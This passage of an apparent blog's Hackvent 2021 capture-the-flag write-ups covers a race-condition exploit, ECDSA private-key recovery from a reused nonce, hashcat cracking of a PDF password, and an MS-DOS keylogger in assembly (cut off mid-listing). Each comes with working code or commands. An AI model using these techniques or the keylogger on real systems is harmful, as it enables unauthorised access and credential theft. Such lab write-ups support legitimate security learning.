class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Santa watched the newly released 6th part of his favorite anime and binge-watched it multiple times already. Unfortunately he can now no longer remember which characters he used to set up his wallet and can&#8217;t access his funds to buy the gifts for Christmas. Can you help Santa out?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>No knowledge about&nbsp;<code>JoJo's Bizarre Adventure<\/code>&nbsp;is required to solve this challenge<\/li>\n\n\n\n<li>No extensive brute force or wordlist is required<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"922\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-922x1024.png\" alt=\"\" class=\"wp-image-1732\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-922x1024.png 922w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-270x300.png 270w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-768x853.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31.png 1102w\" sizes=\"auto, (max-width: 922px) 100vw, 922px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>We got the whole source code of the application. There are many hints which indicate that there is a race-condition in the application. E.g. the comment in the unit-test, the blocking of the concurrent requests and the button in the website which is disabled after submitting a request.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"kotlin\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">package dev.honegger.hackvent2021.santacryptovault.controllers\nimport dev.honegger.hackvent2021.santacryptovault.services.VaultCode\nimport kotlinx.coroutines.*\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Disabled\nimport org.junit.jupiter.api.Test\nimport org.springframework.beans.factory.annotation.Autowired\nimport org.springframework.boot.test.context.SpringBootTest\nimport org.springframework.http.HttpStatus\nimport kotlin.time.Duration.Companion.milliseconds\n@SpringBootTest(\n    properties = [\n        \"vault.secret.bestCharacter=Correct_hash\",\n        \"vault.secret.bestWaifu=Correct_hash\",\n        \"vault.secret.reliableGuy=Correct_hash\",\n        \"vault.secret.bestStand=Correct_hash\",\n        \"vault.secret.bestVillain=Correct_hash\",\n    ]\n)\nclass VaultControllerTests {\n    @Autowired\n    lateinit var controller: VaultController\n    private val dummyCode = VaultCode(\n        bestCharacter = \"Dio\",\n        bestWaifu = \"Dio\",\n        reliableGuy = \"Dio\",\n        bestStand = \"Dio\",\n        bestVillain = \"Dio\",\n    )\n    @Test\n    fun `too many requests get blocked`() = runBlocking {\n        val firstRequests = listOf(\n            async { controller.check(dummyCode) },\n            async { controller.check(dummyCode) },\n        )\n        delay(100.milliseconds)\n        val additionalRequest = controller.check(dummyCode)\n        val results = firstRequests.awaitAll()\n        results.forEach {\n            Assertions.assertEquals(\n                HttpStatus.FORBIDDEN,\n                it.statusCode\n            )\n        }\n        Assertions.assertEquals(\n            HttpStatus.TOO_MANY_REQUESTS,\n            additionalRequest.statusCode\n        )\n    }\n    @Test\n    @Disabled(\"TODO sometimes this test fails and a dummyCode passes, hopefully just a test issue\")\n    fun `parallel execution works`() = runBlocking {\n        listOf(\n            async { controller.check(dummyCode) },\n            \/\/ Hint: This delay needs to be adjusted based on computer speed if you want to run the test locally\n            async { delay(375.milliseconds); controller.check(dummyCode) },\n        ).map {\n            it.await()\n        }.forEach {\n            Assertions.assertEquals(\n                HttpStatus.FORBIDDEN,\n                it.statusCode\n            )\n        }\n    }\n}<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"kotlin\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">package dev.honegger.hackvent2021.santacryptovault.controllers\nimport dev.honegger.hackvent2021.santacryptovault.services.WalletService\nimport dev.honegger.hackvent2021.santacryptovault.services.VaultCode\nimport dev.honegger.hackvent2021.santacryptovault.services.VaultService\nimport kotlinx.coroutines.*\nimport mu.KotlinLogging\nimport org.springframework.http.HttpStatus\nimport org.springframework.http.ResponseEntity\nimport org.springframework.web.bind.annotation.GetMapping\nimport org.springframework.web.bind.annotation.RestController\nimport java.util.concurrent.atomic.AtomicInteger\nimport kotlin.time.Duration.Companion.seconds\n\/**\n * Prevent evil DDOS or Brute-Force attacks\n *\/\nprivate const val maxConcurrentRequests = 2\n\/**\n * Prevent time based Brute-Force attacks\n *\/\nprivate val constRequestDuration = 2.seconds\nprivate val log = KotlinLogging.logger {  }\n@RestController\nclass VaultController(private val vaultService: VaultService, private val walletService: WalletService) {\n    private var activeRequests = AtomicInteger(0)\n    private val scope = CoroutineScope(Dispatchers.Default)\n    @GetMapping(\"\/check\")\n    suspend fun check(code: VaultCode): ResponseEntity&lt;String> {\n        return if (activeRequests.incrementAndGet() &lt;= maxConcurrentRequests) {\n            try {\n                log.info { \"Checking $code\" }\n                val delayTask = scope.async { delay(constRequestDuration) }\n                val codeTask = scope.async { vaultService.checkCode(code) }\n                val res = codeTask.await()\n                delayTask.await()\n                if (res) {\n                    ResponseEntity.ok(\"Correct code! Here's your crypto wallet: ${walletService.walletAddress}\")\n                } else {\n                    ResponseEntity.status(HttpStatus.FORBIDDEN).body(\"Wrong code!\")\n                }\n            } finally {\n                activeRequests.decrementAndGet()\n            }\n        } else {\n            activeRequests.decrementAndGet()\n            log.info { \"Blocked DDOS attack\" }\n            ResponseEntity.status(HttpStatus.TOO_MANY_REQUESTS).body(\"Too many parallel requests!\")\n        }\n    }\n}<\/pre>\n\n\n\n<p>I solved this task by entering the curl command in one terminal and running a bash loop in a second terminal. After 2-3 minutes I got the flag. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">while true; do curl \"https:\/\/b805c837-cac5-47b2-8aa4-a9fab4730ede.idocker.vuln.land\/check?bestCharacter=Dio&amp;bestWaifu=Dio&amp;reliableGuy=Dio&amp;bestStand=Dio&amp;bestVillain=Dio\"; done<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-68-1-1024x237.png\" alt=\"\" class=\"wp-image-1814\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{c0ncurrency_1s_a_b1tch}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.17] Forging Santa&#8217;s Signature<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"118\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32.png\" alt=\"\" class=\"wp-image-1733\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32.png 822w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32-768x110.png 768w\" sizes=\"auto, (max-width: 822px) 100vw, 822px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>ice<\/em>. It&#8217;s their signature dish!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa is out of town and the elves have to urgently sign for an order. What to do, what to do? Well, need to save Christmas, so forge Santa&#8217;s signature they shall!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help the elves help Santa help everyone?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<p>The message to be signed is hashed as follows:&nbsp;<code>int(sha512(content.encode('utf-8')).hexdigest(), 16)<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"423\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-1024x423.png\" alt=\"\" class=\"wp-image-1734\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-1024x423.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-300x124.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-768x317.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33.png 1230w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>On the challenge website we can sign sample messages and execute commands if we can properly sign them.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-70-1024x271.png\" alt=\"\" class=\"wp-image-1820\"\/><\/figure>\n\n\n\n<p>First, I googled for P-384 and came across the <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/Elliptic_Curve_Digital_Signature_Algorithm\" target=\"_blank\">ECDSA Signature Algorithm<\/a>. In my research I discovered that the bug\/problem used for this challenge was the reason that the <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/PlayStation_3_homebrew\" target=\"_blank\">Playstation 3 was hacked by fail0verflow and geohot<\/a>. The problem exists when a poor or no random generator is used and the nonce always stays the same. I also stumbled across a <a rel=\"noreferrer noopener\" href=\"https:\/\/www.youtube.com\/watch?v=sYCzu04ftaY\" target=\"_blank\">video of LiveOverflow on youtube<\/a>, who explains in detail how to solve this kind of CTF challenge. My solution is heavily based on the mentioned youtube video.<\/p>\n\n\n\n<p>With the same nonce, the two messages in the print screen and the signatures we can recover the signing key and sign our own command to solve this challenge. The command &#8220;cat flag.txt&#8221; is used to read the content of the flag. Here is my script:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from hashlib import sha512\nfrom ecdsa.curves import NIST384p\nfrom ecdsa.numbertheory import inverse_mod\nfrom ecdsa import SigningKey\nfrom ecdsa.util import string_to_number, sigencode_strings\nfrom dataclasses import dataclass, field\nfrom numpy import mod\ndef get_signature(message, signing_key, private_key):\n    sigr, sig = signing_key.sign(message.encode('utf-8'), k=private_key, sigencode=sigencode_strings, hashfunc=sha512, allow_truncate=True)\n    return string_to_number(sigr), string_to_number(sig)\nn = NIST384p.order\nr1 = 5858732217639868639411386743809793774024746786952853845150182054444060335615795388004347925624921216402601780245474\ns1 = 24775390985096693628587027542033193722178956113964732633660589449938083762410321188008407598547182884719288898328927\nm1 = \"Sample 1\"\nz1 = int(sha512(m1.encode('utf-8')).hexdigest(), 16)\nz1 = z1 >> (512 - int(NIST384p.order).bit_length())\nr2 = 5858732217639868639411386743809793774024746786952853845150182054444060335615795388004347925624921216402601780245474\ns2 = 2011626295771525712212976969583419665940885391604065641883244102761256044025895922113900869438754143591054921598902\nm2 = \"Sample 2\"\nz2 = int(sha512(m2.encode('utf-8')).hexdigest(), 16)\nz2 = z2 >> (512 - int(NIST384p.order).bit_length())\nk = (((z1 - z2) %n) * inverse_mod(s1 - s2, n)) %n\nprint(\"got k: \" + str(k))\ndA = ((((s1*k)%n) -z1) * inverse_mod(r1,n)) %n\nprint(\"got DA: \" + str(dA))\nsk = SigningKey.from_secret_exponent(dA,curve=NIST384p)\nprint(get_signature(\"cat flag.txt\", sk, k))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ python3 sol.py\ngot k: 1403827651692161146480849641683810706894875255817855607788378779847968599038129200139880981523307336790480705837853\ngot DA: 37359027294104166988040099919169160805154413368249661614739727606944143104440877050919128026845236700442103481261264\n(5858732217639868639411386743809793774024746786952853845150182054444060335615795388004347925624921216402601780245474, 19734950972302764859836649590795926779990380369758052552114472465653004798967695373456125244935806469449514350652879)\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-71-1024x157.png\" alt=\"\" class=\"wp-image-1821\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{what&#8217;s_in_a_nonce?}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.18] Lost Password<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"122\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34.png\" alt=\"\" class=\"wp-image-1735\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34.png 816w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34-300x45.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34-768x115.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>monkey<\/em>. Running a very tight ship \ud83d\ude09<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa is getting a bit cross with Snowball the elf&#8230;<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: Let me get this straight. I asked you to encrypt all our PDF files to prevent our lists of names from getting into the wrong hands, right?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Right.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: And then I asked you to send me the password to these files so I can access them, yes?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Yes.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: So you sent me the password in a PDF file.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: A PDF, yes.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: Which was encrypted.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Yes. As per your instructions. We don&#8217;t want the password to get into the wrong hands, do we?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: But I can&#8217;t open this password file without knowing what the password is, can I? Could you please just write it down for me? You&nbsp;<em>do<\/em>&nbsp;remember it, don&#8217;t you?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Umm&#8230;.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: Snowball! Don&#8217;t tell me you forgot the password!<\/p>\n<\/blockquote>\n\n\n\n<p>Uh-oh. It&#8217;s starting to look like Christmas is ruined. Is there anything you can do to retrieve the password from&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/32306570-b1cb-4f99-a036-5242e1670dee.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">this file<\/a>?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag-Format:&nbsp;<code>HV{__________}<\/code><\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Another very resource intensive challenge&#8230; I used the tools and information from <a rel=\"noreferrer noopener\" href=\"https:\/\/blog.didierstevens.com\/2017\/12\/26\/cracking-encrypted-pdfs-part-1\/\" target=\"_blank\">Didier Stevens<\/a> to solve this challenge.<\/p>\n\n\n\n<p>Step 1 &#8211; Analyze the PDF<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-72-1-1024x633.png\" alt=\"\" class=\"wp-image-1826\"\/><\/figure>\n\n\n\n<p>We have a PDF file with the PDF version 1.6. In the PDF are 27 different objects. Let&#8217;s look closer at the objects with pdf-parser.py and see if we find anything of interest:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-73-1024x543.png\" alt=\"\" class=\"wp-image-1827\"\/><\/figure>\n\n\n\n<p>We have an AES symmetric encryption with 128bit&#8230; Doesn&#8217;t sound like we can bruteforce this password. One object in the PDF is suspicious though, the font object:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-74-1024x299.png\" alt=\"\" class=\"wp-image-1828\"\/><\/figure>\n\n\n\n<p>If we look at the widths and map the array to the characters in the alphabet, we can take the assumption that characters with width of 0 are non-existent. That means we have a limited character set for the password with the charset:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">#\/6EHQRVgjwx{}<\/pre>\n\n\n\n<p>According to the hint the flag-format and the password is &#8220;<code>HV{__________}<\/code>&#8220;. There are 10 characters between the brackets {}. I took the assumption, that the characters HV{} are only used for the outer part of the flag &#8220;HV{}&#8221; and removed these characters from the character set. I did store the final character set to the file charset.txt.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">#\/6EQRgjwx<\/pre>\n\n\n\n<p>With all this information it is suitable to brute-force the password. It still took ages on my laptop to compute though. To be precise it took me 5 hours and 35 minutes! <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ hashcat -m 10500 -a 3 -i doc.hash -1 charset.txt HV{?1?1?1?1?1?1?1?1?1?1} --force --increment-min=14<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hashcat-1024x264.png\" alt=\"\" class=\"wp-image-1829\"\/><\/figure>\n\n\n\n<p>With the password &#8220;HV{E6wRx#jQ\/g}&#8221; we can open the PDF and get the confirmation that the password is also our flag. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-75-717x1024.png\" alt=\"\" class=\"wp-image-1830\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{E6wRx#jQ\/g}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.19] Santa&#8217;s Trusty System<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-35-1.png\" alt=\"\" class=\"wp-image-1736\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkstar<\/em>. All hail stability!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa has been using his trusty system for more than a quarter of a century and his elves think the software is far too old and insecure. They&#8217;re asking you to have a look at&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/f9be3353-cbe3-4b95-a8ec-da37129f170a.zip\" target=\"_blank\" rel=\"noreferrer noopener\">the software<\/a>. They&#8217;d also be willing to swap one of the disks if you provide an updated version. You&#8217;ll of course get it back as soon as they&#8217;ve done a quick sanity test on Santa&#8217;s system.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you please take a look at the software and see if it&#8217; secure?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I couldn&#8217;t have solved this challenge without the help of &#8220;ice&#8221;. I understood what needed to be done in the challenge, but struggled in the assembler part. Therefore the assembler-code is mainly his. Thanks a lot for the support.<\/p>\n\n\n\n<p>The challenge provides this website:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-36-1024x453.png\" alt=\"\" class=\"wp-image-1737\"\/><\/figure>\n\n\n\n<p>Moreover we have two img files fda.img and fdb.img together with a run.sh script to run the files in qemu. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-77-1024x655.png\" alt=\"\" class=\"wp-image-1834\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-78-1024x233.png\" alt=\"\" class=\"wp-image-1835\"\/><\/figure>\n\n\n\n<p>Let&#8217;s mount the fda.img image locally and see what the content is. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-76-1024x454.png\" alt=\"\" class=\"wp-image-1833\"\/><\/figure>\n\n\n\n<p>Together with the website of the challenge we can figure out what is needed to solve this:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AUTOEXEC.BAT loads b:\\init.bat which is under our control<\/li>\n\n\n\n<li>We can upload fdb.img to the website, with a init.bat and load our own program which will be executed before the hv21.exe<\/li>\n\n\n\n<li>If we are able to write output to b:\\ and the checksum of fdb.img changes after execution, we can download the image. <\/li>\n<\/ul>\n\n\n\n<p>In my perspective there are two ways to solve the challenge. 1) Write a keylogger for MS-DOS which saves the keystrokes to b:\\ and load it in the init.bat file. 2) Patch the HV21.exe file to save the keystrokes\/password to b:\\ and replace the original HV21.exe with the init.bat file. I went for solution number one. <\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 1 &#8211; ASM keylogger<\/h3>\n\n\n\n<p>Thanks to ice I could create the following keylogger in assembly, which is based on this source code: <a href=\"https:\/\/github.com\/MrMichael2002\/Keylogger-scan-codes\/blob\/master\/KEYS.ASM\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/MrMichael2002\/Keylogger-scan-codes\/blob\/master\/KEYS.ASM <\/a><\/p>\n\n\n\n<p>HV21.exe registers the interrupt routine 09h and therefore we need to address this in the assembly code, otherwise the keylogger will not work during the execution of hv21.exe &#8211; then we won&#8217;t get the username &amp; password. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.model tiny\n.code\n.386\norg 100h\nStart:\n\t\tjmp\treal_start\nedited\t\tdw\t0\nmagic\t\tdw\t0BABAh\nlogfile\t\tdb\t'b:\\output.txt', 0\nhandle\t\tdw\t0\nbuf\t\tdb\t320 dup (?)\nbufptr          dw\t0\nmust_write\tdb\t0\n;IRQ1 - KEYBOARD DATA READY\nnew_09h:\n\t\tpushf\n\t\tpusha\n\t\tpush\tes\n\t\tpush\tds\n\t\tpush\tcs\n\t\tpop\tds\t;Remember segments\n\t        cmp\tbufptr, 160\n\t\tjae\tcall_old_09\t;Check if buffer is overflown\n\t\tin\tal, 60h\n\t\t;cmp   \tal, 39h  \t;Don't remember Shift, Alt and Ctrl\n\t\t;ja    \tcall_old_09\n\t\t;cmp   \tal, 2Ah\n\t\t;je    \tcall_old_09\n\t\t;cmp   \tal, 36h\n\t\t;je    \tcall_old_09\n\t\tpush  \t0\n\t\tpop   \tes\n\t\tmov   \tah, byte ptr es:[417h]\n\t\ttest  \tah, 43h                 ;Check if both shifts and CapsLock pressed\n\t\tje    \tpk1\n\t\tadd   \tal, 80h\npk1:\n\t\tmov \tdi, bufptr\n      \tmov   \tbuf[di], al\n      \tinc   \tdi\n        mov   \tbufptr, di\n        mov   \tmust_write, 1\ncall_old_09:\n        \tcmp edited, 3\n            jb second\n            pop\tds\n            pop\tes\n            popa\n            popf\n            jmp\tdword ptr cs:[old_09_offset]\t;Jump to old int09 handler\nsecond:     pop\tds\n            pop\tes\n            popa\n            popf\n            jmp\tdword ptr cs:[hv_offset]        ;Jump to hv21.exe handler\nold_09_offset  dw ?\nold_09_segment dw ?\n;DOS IDLE INTERRUPT\nnew_28h:\n\t\tpushf\n\t\tpusha\n\t\tpush  \tes\n\t\tpush  \tds\n\t\tpush  \tcs\n\t\tpop   \tds\n\t\tcmp   \tmust_write, 1\n\t\tjne   \tcall_old_28\n\t\tcmp   \tbufptr, 160\n\t\tjb    \tcall_old_28\n\t\tmov   \tax, 3d01h\n\t\tlea   \tdx, logfile\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \thandle, ax\n\t\tmov   \tbx, ax\n\t\tmov   \tax, 4202h\n\t\txor   \tcx, cx\n\t\txor   \tdx, dx\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \tah, 40h\n\t\tmov   \tbx, handle\n\t\tmov   \tcx, bufptr\n\t\tlea   \tdx, buf\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \tah, 3Eh\n\t\tmov   \tbx, handle\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \tmust_write, 0\n\t\tmov   \tbufptr, 0\ncall_old_28:\n\t\tpop\tds\n\t\tpop   \tes\n\t\tpopa\n\t\tpopf\n\t\tjmp\tdword ptr cs:[old_28_offset]\nold_28_offset  dw ?\nold_28_segment dw ?\nnew_21h:\n\t\tpushf\n\t\tpusha\n\t\tpush  \tes\n\t\tpush  \tds\n\t\tpush  \tcs\n\t\t;pop   \tds\n\t\tcmp\tax, 2509h\n\t\tjne    \tcall_old_21\n\t\tmov\tcs:hv_offset, dx\n\t\tmov\tcs:hv_segment, ds\n\t\tinc\tedited\n        \tpop     ds\n        \tpop     ds\n        \tpop     es\n        \tpopa\n        \tpopf\n        \tiret\ncall_old_21:\n\t\tpop     ds\n        \tpop     ds\n\t\tpop     es\n\t\tpopa\n\t\tpopf\n\t\tjmp     dword ptr cs:[old_21_offset]\nhv_offset\tdw ?\nhv_segment\tdw ?\nold_21_offset  dw ?\nold_21_segment dw ?\nreal_start:\n\t\tmov\tax, 3509h\t\t;Get old int09h address\n\t\tint   \t21h\n\t\tcmp   \tword ptr es:magic, 0BABAh ;Check if has been installed\n\t\tje    \talready_inst\n\t\tmov   \tcs:old_09_offset, bx    ;Remember old int09h handler\n\t\tmov   \tcs:old_09_segment, es\n\t\tmov   \tax, 2509h\t\t;Set new int09h handler\n\t\tmov   \tdx, offset new_09h\n\t\tint   \t21h\n\t\tmov   \tax, 3528h               ;Get old 28h handler\n\t\tint   \t21h\n\t\tmov   \tcs:old_28_offset, bx\n\t\tmov   \tcs:old_28_segment, es\n\t\tmov   \tax, 2528h\t\t;Set new 28h handler\n\t\tmov   \tdx, offset new_28h\n\t\tint   \t21h\n\t\tmov\tax, 3521h\t\t;Get old21h handler\n\t\tint\t21h\n\t\tmov\tcs:old_21_offset, bx\n\t\tmov\tcs:old_21_segment, es\n\t\tmov   \tax, 2521h\t\t;Set new 21h handler\n\t\tmov   \tdx, offset new_21h\n\t\tint   \t21h\n\t\tcall  \tcreate_log_file\n\t\tmov   \tdx, offset ok_installed\n\t\tmov   \tah, 09h\n\t\tint   \t21h\n\t\t;mov     dx, offset real_start   ;TSR\n\t\t;int     27h\n                mov       dx, offset real_start\n                mov       cl, 4\n                shr       dx, cl\n                add       dx, 111h\n                mov       ax, 3100h\n                int       21h\ncreate_log_file:\n\t\tmov   \tax, 3D01h\t;Try to open file\n\t\tlea   \tdx, 